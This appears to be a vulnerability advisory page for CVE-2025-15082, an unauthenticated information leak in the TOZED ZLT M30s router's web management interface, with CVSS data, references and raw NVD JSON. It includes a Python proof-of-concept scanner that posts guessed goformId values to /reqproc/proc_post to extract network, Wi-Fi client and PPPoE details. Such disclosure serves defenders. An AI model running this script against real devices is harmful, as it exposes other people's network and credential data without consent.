CVE-2025-15082

Description

A vulnerability was found in TOZED ZLT M30s up to 1.47. Impacted is an unknown function of the file /reqproc/proc_post of the component Web Management Interface. Performing manipulation of the argument goformId results in information disclosure. It is possible to initiate the attack remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:gztozed:zlt_m30s_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:gztozed:zlt_m30s:-:*:*:*:*:*:*:* - NOT VULNERABLE

TOZED ZLT M30s < 1.48

TOZED ZLT M30s 1.47及之前所有版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# CVE-2025-15082 PoC - TOZED ZLT M30s Information Disclosure
# Target: /reqproc/proc_post endpoint
# Affected: TOZED ZLT M30s up to version 1.47

target_ip = "192.168.1.1"  # Router IP address
target_port = 80

url = f"http://{target_ip}:{target_port}/reqproc/proc_post"

# Common goformId values that may trigger information disclosure
form_ids = [
    "getWlanSSID",
    "getNetworkConfig",
    "getSystemInfo",
    "getArpTable",
    "getDhcpClients",
    "getPortMapping",
    "getWifiClients",
    "getFirewallRules",
    "getPPPoEInfo",
    "getDeviceInfo"
]

headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
    "Content-Type": "application/x-www-form-urlencoded",
    "Referer": f"http://{target_ip}/"
}

print(f"[*] Scanning {target_ip} for CVE-2025-15082")
print(f"[*] Target endpoint: {url}")
print("-" * 50)

for form_id in form_ids:
    data = {
        "goformId": form_id,
        "isTest": "false",
        "cmd": form_id
    }
    
    try:
        response = requests.post(url, data=data, headers=headers, timeout=5)
        
        if response.status_code == 200 and len(response.text) > 0:
            print(f"\n[+] Possible info leak with goformId={form_id}")
            print(f"    Status: {response.status_code}")
            print(f"    Response length: {len(response.text)} bytes")
            print(f"    Response preview: {response.text[:200]}...")
    except requests.exceptions.RequestException as e:
        print(f"[-] Error with goformId={form_id}: {e}")

print("\n[*] Scan complete")
print("[*] Note: This PoC demonstrates the vulnerability pattern")
print("[*] Actual exploitation may require specific parameter values")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-15082
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-15082
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-15082/
[4] VulDB https://vuldb.com/cve/CVE-2025-15082
[5] https://vuldb.com/?ctiid.338410
[6] https://vuldb.com/?id.338410
[7] https://vuldb.com/?submit.707306
[8] https://www.hacklab.eu.org/blogs/zlt_m30s_information_disclosure
[9] https://youtu.be/u_H29UdiPOc

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-15082", "sourceIdentifier": "[email protected]", "published": "2025-12-25T17:15:41.403", "lastModified": "2026-01-20T19:54:27.513", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was found in TOZED ZLT M30s up to 1.47. Impacted is an unknown function of the file /reqproc/proc_post of the component Web Management Interface. Performing manipulation of the argument goformId results in information disclosure. It is possible to initiate the attack remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "baseScore": 5.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 10.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-284"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:gztozed:zlt_m30s_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.47", "matchCriteriaId": "206C4196-AA78-496B-967E-66660AC2E02B"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:gztozed:zlt_m30s:-:*:*:*:*:*:*:*", "matchCriteriaId": "DCBA4183-9238-4E02-BEDB-FE2927BD77C7"}]}]}], "references": [{"url": "https://vuldb.com/?ctiid.338410", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.338410", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.707306", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://www.hacklab.eu.org/blogs/zlt_m30s_information_disclosure", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://youtu.be/u_H29 ... (truncated)